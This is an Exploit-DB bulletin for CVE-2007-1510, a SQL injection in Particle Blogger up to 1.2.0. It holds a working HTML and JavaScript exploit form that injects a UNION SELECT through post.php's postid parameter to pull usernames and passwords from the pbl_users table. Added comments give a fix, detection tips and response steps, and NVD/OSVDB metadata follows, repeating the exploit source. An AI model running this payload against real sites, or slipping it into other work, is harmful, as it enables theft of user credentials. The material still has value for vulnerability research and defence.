ID EDB-ID:3500
Type exploitdb
Reporter WiLdBoY
Modified 2007-03-16T00:00:00
Description
Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit. CVE-2007-1510. Webapps exploit for php platform
<!--
Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit
Type :
SQL Injection
Release Date :
{2007-03-16}
Product / Vendor :
Particle Soft
http://blogger.particlesoft.net/
Bug :
http://localhost/script/post.php?postid=-SQL Inj-
Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit :
-->
<!--
Page head of the standalone proof-of-concept form: sets the window title and a
black page background. The <body> element opened here is never closed in this
listing.
-->
<title>Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit</title>
<body bgcolor="#000000">
<script language="JavaScript">
// ps(): onsubmit handler of the form named "unique". It overwrites the form's
// action with <site field value> + "/post.php?postid=..." and then submits the
// form from script.
//
// What the request demonstrates (CVE-2007-1510, as described in the bulletin
// on this page): post.php in Particle Blogger 1.0.0 through 1.2.0 lets the
// postid parameter alter the SQL statement it runs. The value used here is not
// a number; it appends a UNION SELECT that reads the username and password
// columns of the pbl_users table.
//
// Defender notes:
//  - Root-cause fix: accept postid only as an integer (cast or reject anything
//    else) and bind it through a parameterized query instead of building the
//    SQL string by concatenation. NOTE(review): post.php is not shown on this
//    page; confirm how it builds the query before patching.
//  - Detection: the form method is POST, but the crafted value travels in the
//    URL query string, so it appears in ordinary web-server access logs. Flag
//    post.php requests whose postid is not a plain non-negative integer. The
//    SQL keywords are separated by /**/ comments rather than spaces and the
//    value ends in an unterminated /*, so matching rules should not depend on
//    whitespace between keywords.
//  - Response: if such requests are found against an affected version, treat
//    every credential stored in pbl_users as exposed and reset it. Whether the
//    password column holds hashes or plaintext is not shown on this page.
function ps() {
// Redundant inner block: the extra braces have no effect on behavior.
{
// "unique" is reached as a bare global, which relies on the browser exposing
// the named form that way; the site value is read through document.unique.
unique.action=""+document.unique.site.value+"/post.php?postid=-1/**/UNION/**/SELECT/**/null,username,password,null,null,null,null/**/FROM/**/pbl_users/*";
// Submit programmatically with the action that was just assigned.
unique.submit();
}
}
</script>
<!--
Visible page: a heading, the form named "unique", and the author's credit lines.
The form has a single text field, "site", holding the base URL of a Particle
Blogger installation (default http://localhost/script), and a submit button. It
declares no action attribute; the onsubmit handler ps() assigns one before the
form is sent.

Markup defects in this listing, left as published:
  * the "Site Address" line closes a </td> that was never opened and leaves its
    <font> element unclosed;
  * the "site" input carries two class attributes (HTML parsers keep the first);
  * the <form> element is never closed.
-->
<center><font face="Verdana" size="2" color="#FF0000"><b>Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit</b></font></center>
<form name="unique" method="POST" onsubmit="ps();">
<center><font face="Arial" size="2" color="#00FF00">Site Address :</td></center><br>
<center><input type="text" name="site" value="http://localhost/script" size="44" class="unique" class="inputbox"></center><br>
<center><input type="submit" value="Apply" class="unique"></center><br>
<center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font>
<br>
<font face="Verdana" size="2" color="#FF0000"><b>UniquE@UniquE-Key.ORG</b></font>
<br>
<font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>
<!--
Tested :
Particle Blogger 1.1.2
Vulnerable :
Particle Blogger 1.2.0
Particle Blogger 1.1.2
Particle Blogger 1.1.1
Particle Blogger 1.1.0
Particle Blogger 1.0.0
Author :
UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org
-->
# milw0rm.com [2007-03-16]
{"id": "EDB-ID:3500", "hash": "da8ea88f9b7ec5ca4a2c38b29c901f11", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Particle Blogger <= 1.2.0 post.php postid Remote SQL Injection Exploit", "description": "Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit. CVE-2007-1510. Webapps exploit for php platform", "published": "2007-03-16T00:00:00", "modified": "2007-03-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3500/", "reporter": "WiLdBoY", "references": [], "cvelist": ["CVE-2007-1510"], "lastseen": "2016-01-31T18:37:57", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1510"]}, {"type": "osvdb", "idList": ["OSVDB:34305"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7414"]}], "modified": "2016-01-31T18:37:57"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3500/", "sourceData": "<!--\n\nParticle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit\n\nType :\n\nSQL Injection\n\nRelease Date :\n\n{2007-03-16}\n\nProduct / Vendor :\n\nParticle Soft\n\nhttp://blogger.particlesoft.net/\n\nBug :\n\nhttp://localhost/script/post.php?postid=-SQL Inj-\n\nParticle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit :\n\n-->\n\n<title>Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit</title>\n<body bgcolor=\"#000000\">\n<script language=\"JavaScript\">\nfunction ps() {\n {\n unique.action=\"\"+document.unique.site.value+\"/post.php?postid=-1/**/UNION/**/SELECT/**/null,username,password,null,null,null,null/**/FROM/**/pbl_users/*\";\n unique.submit();\n }\n}\n</script>\n<center><font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection 
Exploit</b></font></center>\n<form name=\"unique\" method=\"POST\" onsubmit=\"ps();\">\n<center><font face=\"Arial\" size=\"2\" color=\"#00FF00\">Site Address :</td></center><br>\n<center><input type=\"text\" name=\"site\" value=\"http://localhost/script\" size=\"44\" class=\"unique\" class=\"inputbox\"></center><br>\n<center><input type=\"submit\" value=\"Apply\" class=\"unique\"></center><br>\n<center><font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>UniquE-Key{UniquE-Cracker}</b></font>\n<br>\n<font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>UniquE@UniquE-Key.ORG</b></font>\n<br>\n<font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>http://UniquE-Key.ORG</b></font></center>\n\n<!--\n\nTested :\n\nParticle Blogger 1.1.2\n\nVulnerable :\n\nParticle Blogger 1.2.0\n\nParticle Blogger 1.1.2\n\nParticle Blogger 1.1.1\n\nParticle Blogger 1.1.0\n\nParticle Blogger 1.0.0\n\nAuthor :\n\nUniquE-Key{UniquE-Cracker}\nUniquE(at)UniquE-Key.Org\nhttp://www.UniquE-Key.Org\n\n-->\n\n# milw0rm.com [2007-03-16]\n", "osvdbidlist": ["34305"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2018-10-18T15:06:08", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in post.php in Particle Blogger 1.0.0 through 1.2.0 allows remote attackers to execute arbitrary SQL commands via the postid parameter.", "modified": "2018-10-16T12:38:50", "published": "2007-03-20T06:19:00", "id": "CVE-2007-1510", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1510", "title": "CVE-2007-1510", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24559](https://secuniaresearch.flexerasoftware.com/advisories/24559/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0218.html\nISS X-Force ID: 33030\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3500\nFrSIRT Advisory: ADV-2007-1006\n[CVE-2007-1510](https://vulners.com/cve/CVE-2007-1510)\nBugtraq ID: 23005\n", "modified": "2007-03-16T09:04:10", "published": "2007-03-16T09:04:10", "href": "https://vulners.com/osvdb/OSVDB:34305", "id": "OSVDB:34305", "title": "Particle Blogger post.php postid Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-03-17T00:00:00", "published": "2007-03-17T00:00:00", "id": "SECURITYVULNS:VULN:7414", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7414", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}